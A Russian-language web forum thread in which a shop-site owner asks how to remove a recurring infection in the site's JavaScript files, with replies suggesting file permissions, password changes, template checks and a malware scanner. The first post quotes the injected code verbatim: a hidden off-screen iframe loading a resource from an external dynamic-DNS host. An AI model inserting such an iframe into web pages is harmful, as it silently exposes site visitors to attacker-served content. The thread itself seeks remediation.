Вредоносное ПО на сайте

[svan]

Три дня назад по бану на Google обнаружил вирус на сайте. Вот такая дрянь подставляется во все файлы из папки javascript:

<iframe width="55" height="55" style="width:100px;высота:100px;position:absolute;слева:-100px;top:0;" src="http://rxrla.ddns.name/46b2e4f7ff73218ac85.res?11"></iframe>

И url постоянно меняется. Чего только не пробовал и сайт переустанавливал из бекап и из "коробки" результат один - как только сайт начинает работать этот долбаный код опять появляется в файлах js. Базу данных очищал полностью, пароли менял, комп антивирусом проверял.

Откуда он лезет?

Вот сканер http://sitecheck.sucuri.net/scanner/ показывает, как только все файлы в javascript меняешь - все чисто, несколько кликов на сайте - опять вирусняк показывает.

Версия ОС 1.5.3.1

[vikingshop]

444 на файл

пароль на фтп меняли?

на домене есть phpmyadmin, какая версия, какой там метод авторизации?

[Amurov]

AI-Болит v.20121221 — удаленькая искалка вредоносного ПО на хостинге.

Всем доброго времени!

В продолжение и по причине того,что сам зачастую сталкиваюсь (думаю,что и многие из вас,сами того не подозревая..исключая понятно господ "в теме")

с вредоносными и хакерскими скриптами,которые,как правило "вшиты" не только во фришные..но и к сожалению и в платные расширения и модули,шаблоны..огворюсь,совершенно не обязательно приобретенными непосредственно здесь (!) тем не менее,более чем комфортно чувствующими себя и работающими "на хозяина" на вашем же хосте,рекомендую воспользоваться (!! речи не может быть о рекламе) - AI-Bolit - это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.http://www.revisium.com/ai/

[svan]

444 на файл пароль на фтп меняли? на домене есть phpmyadmin, какая версия, какой там метод авторизации?

Вообще на какие файлы надо оставлять право на запись - по идее это выход.

Через базы вообще возможно заражение сайта? Если да, то что там искать?

[ravilr]

сначала разберитесь с шаблоном. Откуда взяли, что как и почему. А то сколько прав не выставляй, а функционал вируса будет сидеть в шаблоне или движке.

[delovoy]

Кстати, мне вот тоже интересно, может ли такой код в шаблонах, изменить потом и другие файлы на сайте?

Или будет работать, только на вне?

[badjoker]

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

[delovoy]

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвечивает синим,нажимаешь,выходит реклама тотализатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Что можно сказать, меняй хостера, меняй пароли...

Заменяй все что можно заменить чистым кодом или сравнивай изменения

Чисти свой ПК

[Nik159]

Подскажите как избавится от этого

[delovoy]

Подскажите как избавится от этого

:-D Вопрос, это только в админке или везде?

[afwollis]

Nik159, руками, видимо. прямыми.

и, как всегда, - чистим комп, меняем пароли...